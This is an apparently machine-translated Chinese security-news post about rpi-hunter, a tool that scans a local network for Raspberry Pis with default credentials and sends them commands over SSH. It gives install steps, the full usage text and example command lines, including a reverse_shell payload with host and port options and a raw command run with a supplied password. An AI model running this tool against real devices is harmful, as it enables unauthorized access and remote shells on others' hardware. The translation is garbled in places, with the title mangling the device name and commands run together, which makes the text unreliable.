安全圈 | 专注于最新网络信息安全讯息新闻

首页

亨特:自動發現和開發藍莓皮

作者 recor 时间 2020-02-27
all

當您的局域網上有多個具有默認或已知憑據的覆盆子Pi時,Rpi hunter非常有用,以便自動向它們發送命令/有效負載。

安裝

sudo pip install -U argparse termcolor sudo apt -y install arp-scan tshark sshpass git clone https://github.com/BusesCanFly/rpi-hunter cd ./rpi-hunter chmod +x rpi-hunter.py sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

用法

看看這段甜蜜的視頻和在NullByte的人寫的相關文章!

./rpi-hunter.py whoami usage: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST] [-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT] [--safe] [-q] optional arguments: -h, --help show this help message and exit --list List available payloads --no-scan Disable ARP scanning -r IP_RANGE IP range to scan -f IP_LIST IP list to use (Default ./scan/RPI_list) -u UNAME Username to use when ssh'ing -c CREDS Password to use when ssh'ing --payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or 'whoami'] -H HOST (If using reverse_shell payload) Host for reverse shell -P PORT (If using reverse_shell payload) Port for reverse shell --safe Print sshpass command, but don't execute it -q Don't print banner

運行./rpi-hunter.py--list查看可用的有效載荷。

./rpi-hunter.py --list

有效負載可以由--list中的有效負載名稱指定,也可以作為原始輸入

--list --payload reverse_shell --payload [your cli command here]

示例用法:

./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337 -H -P ./rpi-hunter.py -c lamepassword --payload "ls -lah \~" \

標準的互聯網娛樂免責聲明適用。不要犯罪,要負責任。

我對你和rpi亨特所做的一切不負任何責任。